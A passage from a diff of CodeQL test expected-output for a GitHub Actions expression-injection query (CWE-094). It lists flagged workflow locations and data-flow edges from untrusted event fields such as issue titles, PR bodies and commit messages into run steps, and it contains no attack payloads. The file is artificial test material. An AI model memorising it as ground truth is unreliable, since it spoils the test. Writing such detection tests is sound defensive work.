| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | env.ISSUE_BODY_PARSED | +| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | env.pr_message | +| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | github.event.discussion.title | +| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | github.event.discussion.body | +| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | github.event.discussion.title | +| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | github.event.discussion.body | +| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | github.event.comment.body | +| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | github.event.pages[1].title | +| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | github.event.pages[11].title | +| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | github.event.pages[0].page_name | +| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | github.event.pages[2222].page_name | +| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | steps.trim-url.outputs.trimmed_url | +| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | github.event.issue.title | +| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | github.event.issue.body | +| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | env.global_env | +| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | env.job_env | +| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | env.step_env | +| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | github.event.pull_request.title | +| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | github.event.pull_request.body | +| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | github.event.pull_request.head.ref | +| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | github.event.review.body | +| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | github.event.pull_request.title | +| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | github.event.pull_request.body | +| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | github.event.pull_request.head.ref | +| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | github.event.comment.body | +| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | github.event.pull_request.title | +| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | github.event.pull_request.body | +| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | github.event.pull_request.head.ref | +| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | github.head_ref | +| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | github.event.commits[11].message | +| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | github.event.commits[11].author.email | +| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | github.event.commits[11].author.name | +| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | github.event.head_commit.message | +| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | github.event.head_commit.author.email | +| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | github.event.head_commit.author.name | +| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | github.event.head_commit.committer.email | +| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | github.event.head_commit.committer.name | +| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | github.event.commits[11].committer.email | +| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | github.event.commits[11].committer.name | +| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | steps.summary.outputs.value | +| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | steps.step.outputs.value | +| .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:15:20:15:58 | github.event.head_commit.message | .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | needs.job1.outputs.job_output | +| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | github.event.workflow_run.display_title | +| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | github.event.workflow_run.head_commit.message | +| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | github.event.workflow_run.head_commit.author.email | +| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | github.event.workflow_run.head_commit.author.name | +| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | github.event.workflow_run.head_commit.committer.email | +| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential expression injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | github.event.workflow_run.head_commit.committer.name | +| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | github.event.workflow_run.head_branch | +| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | github.event.workflow_run.head_repository.description | diff --git a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected index 1ea054565bc..cb924c97ea1 100644 --- a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected 
@@ -1,269 +1,269 @@ edges -| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:26:14:27:95 | \| | -| .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | -| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | -| .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:21:14:24:15 | \| | -| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | -| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | -| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | -| .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | .github/workflows/cross3.yml:41:12:43:5 | \| | -| .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | .github/workflows/cross3.yml:61:21:68:47 | \| | -| .github/workflows/cross3.yml:61:21:68:47 | \| | .github/workflows/cross3.yml:47:12:53:109 | \| | -| .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | -| .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... 
_url }} | -| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | -| .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | -| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | -| .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job0.yml:43:14:43:52 | echo ${ ... utput}} | -| .github/workflows/inter-job0.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | -| .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:30:19:30:63 | ${{ ste ... iles }} | -| .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job0.yml:15:19:15:49 | ${{ ste ... alue }} | -| .github/workflows/inter-job0.yml:30:19:30:63 | ${{ ste ... iles }} | .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | -| .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job1.yml:43:14:43:52 | echo ${ ... utput}} | -| .github/workflows/inter-job1.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | -| .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:30:19:30:63 | ${{ ste ... iles }} | -| .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job1.yml:15:19:15:49 | ${{ ste ... alue }} | -| .github/workflows/inter-job1.yml:30:19:30:63 | ${{ ste ... 
iles }} | .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | -| .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job2.yml:45:14:45:52 | echo ${ ... utput}} | -| .github/workflows/inter-job2.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | -| .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:30:19:30:63 | ${{ ste ... iles }} | -| .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job2.yml:15:19:15:49 | ${{ ste ... alue }} | -| .github/workflows/inter-job2.yml:30:19:30:63 | ${{ ste ... iles }} | .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | -| .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job4.yml:44:14:44:52 | echo ${ ... utput}} | -| .github/workflows/inter-job4.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | -| .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:30:19:30:63 | ${{ ste ... iles }} | -| .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job4.yml:15:19:15:49 | ${{ ste ... alue }} | -| .github/workflows/inter-job4.yml:30:19:30:63 | ${{ ste ... iles }} | .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | -| .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | -| .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | -| .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... 
